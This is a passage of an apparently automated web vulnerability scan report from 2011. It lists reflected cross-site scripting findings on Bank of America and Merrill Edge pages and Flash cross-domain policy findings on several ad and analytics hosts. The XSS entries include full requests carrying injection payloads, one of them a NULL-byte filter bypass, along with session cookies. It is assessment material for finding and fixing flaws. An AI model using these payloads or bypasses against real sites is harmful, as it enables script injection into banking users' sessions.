BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:50:20 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:50:20 GMT
Content-language: en-US
Set-cookie: JSESSIONID=0000e9eWJbK00Pixiad4Sv7pDX9:12qb4kb6q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1,
                   false,
                   'MAf662a';alert(1)//d027475f5ab',
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

4.66. https://www.bankofamerica.com/privacy/Control.do [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1881f'%3balert(1)//dd2288e8694 was submitted in the state cookie. This input was echoed as 1881f';alert(1)//dd2288e8694 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA1881f'%3balert(1)//dd2288e8694; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:50:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00002Z9N97tt_YBpMs8JQRkjAus:12qb4k2ev; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1,
                   false,
                   'MA1881f';alert(1)//dd2288e8694',
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

4.67. https://www.bankofamerica.com/privacy/index.jsp [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 789a0'%3balert(1)//ac10ab97be4 was submitted in the state cookie. This input was echoed as 789a0';alert(1)//ac10ab97be4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA789a0'%3balert(1)//ac10ab97be4; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:50:08 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000HD3pctAiud3N0DAMmKPttdB:12qb4k93q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1,
                   false,
                   'MA789a0';alert(1)//ac10ab97be4',
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

4.68. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef664'%3balert(1)//3ee65bef365 was submitted in the BOA_0020 cookie. This input was echoed as ef664';alert(1)//3ee65bef365 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1ef664'%3balert(1)//3ee65bef365; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:25 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000IJHc7D8tz_28OlBjsB6VB5q:12qb4k2ev; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1ef664';alert(1)//3ee65bef365',
                   false,
                   'MA',
                   null,
                   'homepage');
//-->
...[SNIP]...

4.69. https://www.bankofamerica.com/smallbusiness/index.jsp [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd35'%3balert(1)//09d60cf68b2 was submitted in the state cookie. This input was echoed as cdd35';alert(1)//09d60cf68b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MAcdd35'%3balert(1)//09d60cf68b2; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:47:56 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00003JmdtK8U6bG18Qq0M1TCZsZ:12rfuedb5; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1',
                   false,
                   'MAcdd35';alert(1)//09d60cf68b2',
                   null,
                   'homepage');
//-->
...[SNIP]...

4.70. https://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007eae9"><script>alert(1)</script>d210b1fb8d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7eae9"><script>alert(1)</script>d210b1fb8d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /m/pages/global-oao.aspx?%007eae9"><script>alert(1)</script>d210b1fb8d3=1 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 12:28:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/global-oao.aspx?%007eae9%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed210b1fb8d3=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.7eae9"><script>alert(1)</script>d210b1fb8d3=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 20 instances of this issue:


5.1. http://109.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 109.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "518012-c6-a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Tue, 26 Apr 2011 11:34:21 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://afreshbunch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afreshbunch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 16:55:37 GMT
Accept-Ranges: bytes
ETag: "659d66e23f4c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:11 GMT
Connection: close
Content-Length: 223

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" />


...[SNIP]...

5.4. http://bridgefront.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bridgefront.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bridgefront.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Feb 2010 20:31:09 GMT
ETag: "2f20014-1d1-5033bd40"
Accept-Ranges: bytes
Content-Length: 465
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"></allow-access-from>
<allow-access-from domain="www.bridgefront.com" secure="false"></allow-access-from>
<allow-access-from domain="www.bridgefront.com" secure="true">
...[SNIP]...

5.5. http://data.cmcore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:01 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "1fccb-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=972
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://data.coremetrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:05 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "23c142-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=999
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://firstdata.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: firstdata.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:30 GMT
Server: Omniture DC/2.0.0
xserver: www343
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.8. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 26 Apr 2011 00:37:48 GMT
Expires: Thu, 21 Apr 2011 00:36:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 42634
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.9. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:46:28 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.10. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 27 Apr 2011 01:21:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 26 Apr 2011 01:21:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.11. http://servedby.flashtalking.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:35:53 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
content-type: application/xml
Age: 25694
Via: 1.0 mdw061003 (MII-APC/1.6)
Content-Length: 540
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.12. https://shots-s.snap.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: shots-s.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
